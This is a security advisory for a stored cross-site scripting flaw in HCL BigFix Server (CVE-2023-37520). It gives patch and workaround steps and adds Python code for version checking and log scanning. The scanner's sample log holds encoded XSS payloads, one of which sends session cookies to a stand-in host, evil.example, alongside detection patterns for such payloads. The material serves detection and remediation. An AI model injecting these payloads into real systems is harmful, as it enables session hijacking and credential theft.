CVE-2023-37520
📋 TL;DR
An unauthenticated stored cross-site scripting (XSS) vulnerability in HCL BigFix Server version 9.5.12.68 lets an attacker inject script into the Gather Status Report, which is served by BigFix Relay. The injected script runs in the browser of anyone who later views the report, enabling session hijacking, data exfiltration, or actions performed with the viewer's privileges. Any organization running the affected BigFix Server version is exposed.
💻 Affected Systems
- HCL BigFix Server
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal sensitive data (credentials, system information), hijack user sessions, redirect users to malicious sites, or perform actions on behalf of authenticated users.
Likely Case
Attackers would inject malicious scripts to steal session cookies or credentials from users who view the compromised Gather Status Report, potentially gaining unauthorized access to the BigFix console.
If Mitigated
A web application firewall (WAF) in front of the report, a restrictive Content Security Policy (CSP), and correct output encoding of report fields would block or contain the injected script, so the impact is reduced to blocked or failed injection attempts (which are themselves worth alerting on).
🎯 Exploit Status
This is a stored XSS: the attacker plants the payload once, with no credentials, and it executes every time a user views the Gather Status Report. Exploitation therefore has two steps, an unauthenticated injection into the report data and a later view of the report by a victim, and the victim needs no action beyond opening the report.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 9.5.12.69 or later
Vendor Advisory: https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0109376
Restart Required: Yes
Instructions:
1. Download the latest patch from the HCL BigFix support portal.
2. Apply the patch to the BigFix Server.
3. Restart the BigFix Server services.
4. Verify the patch is applied by checking the version.
🔧 Temporary Workarounds
Disable Gather Status Report
Temporarily disable the vulnerable Gather Status Report feature to prevent exploitation until the patch is applied.
Consult the BigFix documentation for disabling specific report features.
Implement Content Security Policy (CSP)
Add CSP headers to restrict script execution from untrusted sources.
BigFix Server and Relay answer HTTP on their own listener (default port 52311) rather than a general-purpose web server, so a 'Content-Security-Policy' header can only be injected by a reverse proxy placed in front of the console-facing path. Confirm that managed clients can still reach the relay before deploying such a proxy, and treat CSP as defence in depth, not a substitute for the patch.
🧯 If You Can't Patch
- Implement a web application firewall (WAF) with XSS protection rules to block malicious payloads.
- Restrict browser and administrative access to the BigFix Server console to trusted networks only and monitor it for unusual activity. Relays must remain reachable by the endpoints they manage, so restrict who can view the report rather than blocking client traffic to the relay.
🔍 How to Verify
Check if Vulnerable:
Check the BigFix Server version. If it is 9.5.12.68, it is vulnerable; any build below the fixed version 9.5.12.69 has not received the fix and should be checked against the vendor advisory. Review the relay and server logs for script injection attempts targeting Gather Status Reports.
Check Version:
On the BigFix Server, run 'besadmin -version' (BESAdmin on Windows, BESAdmin.sh on Linux) or read the version shown in the BigFix console. Compare the four-part version numerically, not as a string, so that a build such as 9.5.12.9 is not mistaken for a newer release.
Verify Fix Applied:
After patching, verify the BigFix Server version is 9.5.12.69 or later. Test the Gather Status Report feature to ensure no XSS payloads execute.
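The version comparison above is easy to get wrong with plain string comparison. The following is an added example, not part of the advisory or of any HCL tooling; it assumes the version string has already been read from the BES Administration Tool or console, and it classifies that string against the affected build (9.5.12.68) and the fixed build (9.5.12.69) named on this page.

```python
"""Classify an HCL BigFix Server version string against CVE-2023-37520.

Added example: the affected and fixed builds come from the advisory above;
the input version string is assumed to have been read from the BES
Administration Tool or the BigFix console by the operator.
"""
from typing import Tuple

AFFECTED_BUILD: Tuple[int, ...] = (9, 5, 12, 68)   # per the advisory
FIXED_BUILD: Tuple[int, ...] = (9, 5, 12, 69)      # "9.5.12.69 or later"


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '9.5.12.68' into (9, 5, 12, 68).

    Numeric tuples compare element by element, so 9.5.12.9 < 9.5.12.68,
    whereas the strings "9.5.12.9" > "9.5.12.68" would wrongly pass.
    """
    parts = version.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unexpected BigFix version format: {version!r}")
    return tuple(int(p) for p in parts)


def assess(version: str) -> str:
    """Return 'vulnerable', 'fixed', or 'unpatched' for a version string.

    'vulnerable' is the build the advisory names; 'unpatched' is any build
    below the fixed level that the advisory does not explicitly list, which
    still lacks the fix and must be reviewed against the vendor notice.
    """
    v = parse_version(version)
    if v == AFFECTED_BUILD:
        return "vulnerable"
    if v >= FIXED_BUILD:
        return "fixed"
    return "unpatched"


def string_compare_is_wrong(version: str) -> bool:
    """True when naive string comparison disagrees with the numeric check.

    Exists only to show why parse_version() is needed.
    """
    naive_ok = version >= "9.5.12.69"
    numeric_ok = parse_version(version) >= FIXED_BUILD
    return naive_ok != numeric_ok


if __name__ == "__main__":
    for sample in ("9.5.12.68", "9.5.12.69", "9.5.13.130", "10.0.8.37", "9.5.12.9"):
        print(f"{sample:>12}: {assess(sample)}")
```

Feed the function whatever string the admin tool prints; a result of "vulnerable" or "unpatched" means the server still needs the update.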
📡 Detection & Monitoring
Log Indicators:
- Script tags, event-handler attributes (onerror=, onload=), or javascript: URIs in field values written to the Gather Status Report, including their URL-encoded forms
- Repeated requests from one source that attempt to write or modify report data, especially with unusual or oversized values
Network Indicators:
- HTTP requests to BigFix Relay endpoints whose parameters contain script payloads, including URL-encoded and double-encoded variants (%3Cscript, %253Cscript)
- Outbound connections from BigFix console users' browsers to unfamiliar hosts shortly after viewing a Gather Status Report, which is how stolen session data would leave
SIEM Query:
Matching on the bare words "XSS" or "script" generates noise from ordinary log content; match on payload fragments instead and decode percent-encoding before matching where the SIEM supports it:
source="bigfix_logs" AND ("Gather Status Report" OR relay) AND ("<script" OR "%3Cscript" OR "%253Cscript" OR "onerror=" OR "onload=" OR "javascript:")
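Where the SIEM cannot decode percent-encoding, the same detection can run as a small script over exported relay logs. The following is an added example, not part of the advisory or of any HCL tooling. The log lines and the /gather/status request path are constructed for illustration (the page does not name the real report endpoint); the point is the repeated URL-decoding before pattern matching, which catches double-encoded payloads that a single-pass SIEM string match misses, and the absence of a hit on a benign line containing the word "script".

```python
"""Scan relay-style access log lines for stored-XSS injection attempts.

Added example for CVE-2023-37520 monitoring. SAMPLE_LOG is constructed and
the request path is hypothetical; only the matching logic is meant for reuse.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

# Indicators checked after decoding; each regex names the fragment reported.
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.IGNORECASE),
    re.compile(r"\bon(error|load|click|mouseover|focus)\s*=", re.IGNORECASE),
    re.compile(r"javascript\s*:", re.IGNORECASE),
    re.compile(r"<\s*(iframe|img|svg)\b", re.IGNORECASE),
]

# Constructed sample lines: 1 and 4 are benign, 2 is percent-encoded,
# 3 is double-encoded, 5 uses a javascript: URI.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jul/2023:10:01:02 +0000] "GET /gather/status?client=ws-0142 HTTP/1.1" 200 512 "-"',
    '10.0.0.9 - - [12/Jul/2023:10:01:07 +0000] "GET /gather/status?client=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fevil.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 512 "-"',
    '10.0.0.9 - - [12/Jul/2023:10:01:09 +0000] "GET /gather/status?client=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 512 "-"',
    '10.0.0.7 - - [12/Jul/2023:10:02:00 +0000] "GET /gather/status?client=ws-0143 HTTP/1.1" 200 512 "Mozilla/5.0 (scripted-monitor)"',
    '10.0.0.9 - - [12/Jul/2023:10:02:31 +0000] "GET /gather/status?client=javascript:alert(1) HTTP/1.1" 200 512 "-"',
]


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Undo repeated percent-encoding.

    Attackers double-encode ("%253C" -> "%3C" -> "<") to slip past filters
    that decode once; loop until the text stops changing, with a cap so a
    hostile input cannot make this spin.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_xss_indicators(log_lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, matched_fragment) for each line that looks like
    an injection attempt. One hit per line is enough for alerting."""
    hits: List[Tuple[int, str]] = []
    for lineno, line in enumerate(log_lines, start=1):
        decoded = decode_fully(line)
        for pattern in XSS_PATTERNS:
            match = pattern.search(decoded)
            if match:
                hits.append((lineno, match.group(0)))
                break
    return hits


if __name__ == "__main__":
    for lineno, fragment in find_xss_indicators(SAMPLE_LOG):
        print(f"line {lineno}: suspicious fragment {fragment!r}")
```

Note that line 4 carries the word "scripted" in its user agent and is correctly ignored, which is exactly the false positive a bare `"script"` term in the SIEM query would raise.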